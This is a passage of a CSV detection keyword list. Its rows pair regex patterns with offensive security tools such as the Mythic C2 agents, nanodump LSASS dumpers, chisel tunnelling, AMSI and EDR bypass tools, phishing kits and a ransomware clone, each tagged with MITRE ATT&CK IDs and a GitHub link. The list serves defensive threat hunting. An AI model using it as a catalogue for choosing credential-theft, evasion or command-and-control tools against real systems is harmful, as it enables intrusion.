Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*Mystikal-main*",".{0,1000}Mystikal\-main.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*mythic_c2_container*",".{0,1000}mythic_c2_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" 
"*mythic_nginx*",".{0,1000}mythic_nginx.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_payloadtype*",".{0,1000}mythic_payloadtype.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_payloadtype_container*",".{0,1000}mythic_payloadtype_container.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" 
"*mythic_rest.Payload*",".{0,1000}mythic_rest\.Payload.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_service.py*",".{0,1000}mythic_service\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic_translator_containter*",".{0,1000}mythic_translator_containter.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*MythicAgents/Apollo*",".{0,1000}MythicAgents\/Apollo.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" 
"*MythicAgents/Athena*",".{0,1000}MythicAgents\/Athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*MythicAgents/merlin*",".{0,1000}MythicAgents\/merlin.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*MythicAgents/tetanus*",".{0,1000}MythicAgents\/tetanus.{0,1000}","offensive_tool_keyword","tetanus","Mythic C2 agent targeting Linux and Windows hosts written in Rust","T1550 T1555 T1212 T1558","N/A","N/A","N/A","POST Exploitation tools","https://github.com/MythicAgents/tetanus","1","1","N/A","N/A","3","271","40","2024-04-29T01:01:05Z","2022-03-07T20:35:33Z" "*mythic-cli *",".{0,1000}mythic\-cli\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*mythic-cli*athena*",".{0,1000}mythic\-cli.{0,1000}athena.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent 
designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*MythicClient.cs*",".{0,1000}MythicClient\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*mythic-docker*",".{0,1000}mythic\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*MzHmO/DebugAmsi*",".{0,1000}MzHmO\/DebugAmsi.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","10","1","89","20","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z" "*MzHmO/NtlmThief*",".{0,1000}MzHmO\/NtlmThief.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential 
Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*MzHmO/Parasite-Invoke*",".{0,1000}MzHmO\/Parasite\-Invoke.{0,1000}","offensive_tool_keyword","Parasite-Invoke","Hide your P/Invoke signatures through other people's signed assemblies","T1129 - T1574.002 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/MzHmO/Parasite-Invoke","1","1","N/A","8","2","180","30","2024-03-10T14:53:59Z","2024-03-07T20:18:42Z" "*MzHmO/PowershellKerberos*",".{0,1000}MzHmO\/PowershellKerberos.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","1","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*MzHmO/Privileger*",".{0,1000}MzHmO\/Privileger.{0,1000}","offensive_tool_keyword","Privileger","Privileger is a tool to work with Windows Privileges","T1548.002","TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/MzHmO/Privileger","1","1","N/A","8","2","131","28","2023-02-07T07:28:40Z","2023-01-31T11:24:37Z" "*MzHmO/TGSThief*",".{0,1000}MzHmO\/TGSThief.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*n00py/LAPSDumper*",".{0,1000}n00py\/LAPSDumper.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" 
"*n00py/Slackor*",".{0,1000}n00py\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*n0de.exe*elevationstation*",".{0,1000}n0de\.exe.{0,1000}elevationstation.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*n1k7l4i/goMatrixC2*",".{0,1000}n1k7l4i\/goMatrixC2.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*n1k7l4i/goZulipC2*",".{0,1000}n1k7l4i\/goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*n1nj4sec*",".{0,1000}n1nj4sec.{0,1000}","offensive_tool_keyword","Github Username","Github username hosting exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/n1nj4sec","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*nac_bypass*",".{0,1000}nac_bypass.{0,1000}","offensive_tool_keyword","nac_bypass","nac bypass - The basic requirement for an NAC bypass is access to a device that has already been authenticated. 
This device is used to log into the network and then smuggle in network packages from a different device. This involves placing the attackers system between the network switch and the authenticated device. One way to do this is with a Raspberry Pi and two network adapters","T1550.002 - T1078 - T1133 - T1040 - T1550","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Defense Evasion","https://github.com/scipag/nac_bypass","1","1","N/A","N/A","3","247","65","2023-08-02T09:09:19Z","2019-01-03T06:55:00Z" "*nagios-root-privesc.sh*",".{0,1000}nagios\-root\-privesc\.sh.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*naksyn/Pyramid*",".{0,1000}naksyn\/Pyramid.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*--name chisel -p *",".{0,1000}\-\-name\schisel\s\-p\s.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*named_pipes.txt*",".{0,1000}named_pipes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*NamedPipeImpersonation.cs*",".{0,1000}NamedPipeImpersonation\.cs.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*NamedPipeImpersonation.exe*",".{0,1000}NamedPipeImpersonation\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","1","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*NamedPipeServer.ps1*",".{0,1000}NamedPipeServer\.ps1.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - 
TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","0","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*namespace BackupCreds*",".{0,1000}namespace\sBackupCreds.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*namespace CredPhisher*",".{0,1000}namespace\sCredPhisher.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*namespace Jasmin_Encrypter*",".{0,1000}namespace\sJasmin_Encrypter.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*namespace KrbRelayUp*",".{0,1000}namespace\sKrbRelayUp.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*namespace NTLMInjector*",".{0,1000}namespace\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with 
DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*namespace POSTDump*",".{0,1000}namespace\sPOSTDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*namespace POSTMiniDump*",".{0,1000}namespace\sPOSTMiniDump.{0,1000}","offensive_tool_keyword","POSTDump","Another tool to perform minidump of LSASS process using few technics to avoid detection.","T1003 - T1055 - T1562.001 - T1218","TA0005 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "*namespace RedPersist.Persist*",".{0,1000}namespace\sRedPersist\.Persist.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","197","30","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z" "*namespace RemotePipeList*",".{0,1000}namespace\sRemotePipeList.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*namespace 
SharpShares*",".{0,1000}namespace\sSharpShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","N/A","9","1","29","6","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z" "*namespace SilentCryptoMiner*",".{0,1000}namespace\sSilentCryptoMiner.{0,1000}","offensive_tool_keyword","SilentCryptoMiner","A Silent (Hidden) Free Crypto Miner Builder","T1496 - T1055 - T1546 - T1082 - T1574","TA0042 - TA0005 - TA0003 - TA0009","N/A","N/A","Cryptomining","https://github.com/UnamSanctam/SilentCryptoMiner","1","0","N/A","9","10","1032","252","2024-04-11T01:25:28Z","2021-11-08T09:03:32Z" "*namespace WheresMyImplant*",".{0,1000}namespace\sWheresMyImplant.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*nandydark/Linux-keylogger*",".{0,1000}nandydark\/Linux\-keylogger.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","9","8","717","126","2024-03-21T10:05:50Z","2022-09-04T10:48:49Z" "*nanjmdknhkinifnkgdcggcfnhdaammmj*",".{0,1000}nanjmdknhkinifnkgdcggcfnhdaammmj.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*nanodump *",".{0,1000}nanodump\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump -*",".{0,1000}nanodump\s\-.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*nanodump.*",".{0,1000}nanodump\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.git*",".{0,1000}nanodump\.git.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.x64*",".{0,1000}nanodump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.x64.exe*",".{0,1000}nanodump\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump.x86*",".{0,1000}nanodump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_dump*",".{0,1000}nanodump_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*nanodump_pipe*",".{0,1000}nanodump_pipe.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "*nanodump_ppl.x64.dll*",".{0,1000}nanodump_ppl\.x64\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*nanodump_ppl_dump*",".{0,1000}nanodump_ppl_dump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x64*",".{0,1000}nanodump_ppl_dump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_dump.x86*",".{0,1000}nanodump_ppl_dump\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic*",".{0,1000}nanodump_ppl_medic.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x64*",".{0,1000}nanodump_ppl_medic\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*nanodump_ppl_medic.x86*",".{0,1000}nanodump_ppl_medic\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
